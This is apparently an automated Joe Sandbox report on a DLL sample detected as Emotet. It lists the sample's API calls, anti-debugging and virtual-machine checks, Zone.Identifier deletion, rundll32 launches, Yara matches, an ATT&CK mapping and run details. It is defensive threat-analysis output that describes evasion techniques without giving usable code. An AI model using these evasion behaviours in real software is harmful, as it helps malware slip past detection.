                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4AE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,0_2_6E4AE690
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Rxalrmpxe\bkor.jtgJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Rxalrmpxe\bkor.jtg:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C0927 FindFirstFileExW,0_2_6E4C0927
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4C0927 FindFirstFileExW,2_2_6E4C0927
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: Amcache.hve.12.drBinary or memory string: VMware
                      Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.12.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.12.drBinary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
                      Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.12.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: WerFault.exe, 0000000E.00000003.990205890.0000000001164000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000002.992000336.0000000001164000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000002.991697081.0000000000B88000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E4BAB0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D07D2 mov eax, dword ptr fs:[00000030h]0_2_001D07D2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B9990 mov eax, dword ptr fs:[00000030h]0_2_6E4B9990
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BEC0B mov ecx, dword ptr fs:[00000030h]0_2_6E4BEC0B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C02CC mov eax, dword ptr fs:[00000030h]0_2_6E4C02CC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B9920 mov esi, dword ptr fs:[00000030h]0_2_6E4B9920
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B9920 mov eax, dword ptr fs:[00000030h]0_2_6E4B9920
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4B9990 mov eax, dword ptr fs:[00000030h]2_2_6E4B9990
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4BEC0B mov ecx, dword ptr fs:[00000030h]2_2_6E4BEC0B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4C02CC mov eax, dword ptr fs:[00000030h]2_2_6E4C02CC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4B9920 mov esi, dword ptr fs:[00000030h]2_2_6E4B9920
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4B9920 mov eax, dword ptr fs:[00000030h]2_2_6E4B9920
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B07D2 mov eax, dword ptr fs:[00000030h]4_2_031B07D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_034107D2 mov eax, dword ptr fs:[00000030h]6_2_034107D2
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4AE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,0_2_6E4AE690
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A1290 GetProcessHeap,HeapAlloc,RtlAllocateHeap,HeapFree,0_2_6E4A1290
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CFA78 LdrInitializeThunk,0_2_001CFA78
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E4BA462
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E4BAB0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E4C0326
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4BA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6E4BA462
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4BAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6E4BAB0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4C0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6E4C0326
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4612 -ip 4612Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 304Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4612 -ip 4612Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 336Jump to behavior
                      Source: loaddll32.exe, 00000000.00000000.948854020.00000000013C0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.947064309.00000000013C0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.969913878.00000000013C0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.970507321.00000000013C0000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.1064077751.0000000003460000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000000.948854020.00000000013C0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.947064309.00000000013C0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.969913878.00000000013C0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.970507321.00000000013C0000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.1064077751.0000000003460000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000000.948854020.00000000013C0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.947064309.00000000013C0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.969913878.00000000013C0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.970507321.00000000013C0000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.1064077751.0000000003460000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000000.948854020.00000000013C0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.947064309.00000000013C0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.969913878.00000000013C0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.970507321.00000000013C0000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.1064077751.0000000003460000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BA584 cpuid 0_2_6E4BA584
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BA755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6E4BA755
                      Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.32c2240.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.750000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.8e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.e30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.9434a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3753718.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.e30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.31a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3753718.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.5d3908.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.31a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.8e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.32c2240.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.5d3908.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3732240.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3732240.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.9434a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.970291608.00000000001C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.993619798.00000000005BB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.946676422.0000000000E30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.948659088.00000000005BB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.947178520.00000000032AA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.969710134.00000000001C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1048939362.000000000373A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.946359714.00000000031A0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.930138580.0000000000750000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.946894712.00000000005BB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.946802756.000000000371A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.948115797.00000000001C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.899666067.0000000000B2B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.969859357.00000000005BB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.970456137.00000000005BB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1048437033.0000000003400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.946627209.00000000001C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.936268035.000000000092A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.933922652.00000000008E0000.00000040.00000010.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsNative API1Path InterceptionProcess Injection12Masquerading2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery41Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 532437 Sample: nhlHEF5IVY.dll Startdate: 02/12/2021 Architecture: WINDOWS Score: 76 37 Sigma detected: Emotet RunDLL32 Process Creation 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 Yara detected Emotet 2->41 8 loaddll32.exe 1 2->8         started        10 svchost.exe 3 8 2->10         started        process3 process4 12 rundll32.exe 2 8->12         started        15 cmd.exe 1 8->15         started        17 rundll32.exe 8->17         started        23 3 other processes 8->23 19 WerFault.exe 10->19         started        21 WerFault.exe 10->21         started        signatures5 43 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->43 25 rundll32.exe 12->25         started        27 rundll32.exe 15->27         started        29 rundll32.exe 17->29         started        31 rundll32.exe 23->31         started        process6 process7 33 rundll32.exe 25->33         started        35 rundll32.exe 27->35         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      nhlHEF5IVY.dll21%VirustotalBrowse
                      nhlHEF5IVY.dll18%ReversingLabsWin32.Trojan.Phonzy

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.0.loaddll32.exe.1c0000.9.unpack100%AviraHEUR/AGEN.1110387Download File
                      6.2.rundll32.exe.3400000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.1c0000.6.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.2.rundll32.exe.8e0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      5.2.rundll32.exe.e30000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      4.2.rundll32.exe.31a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.2.loaddll32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      3.2.rundll32.exe.750000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.1c0000.3.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://upx.sf.netAmcache.hve.12.drfalse
                        		high

                        Contacted IPs

                        No contacted IP infos

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:532437
                        Start date:02.12.2021
                        Start time:09:45:16
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 10m 17s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:nhlHEF5IVY.dll
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Run name:Run with higher sleep bypass
                        Number of analysed new started processes analysed:16
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal76.troj.evad.winDLL@32/14@0/0
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 21% (good quality ratio 19.4%)
                        • Quality average: 72.1%
                        • Quality standard deviation: 27.5%
                        HCA Information:
                        • Successful, ratio: 70%
                        • Number of executed functions: 32
                        • Number of non-executed functions: 170
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                        • Found application associated with file extension: .dll
                        Warnings:
                        Show All
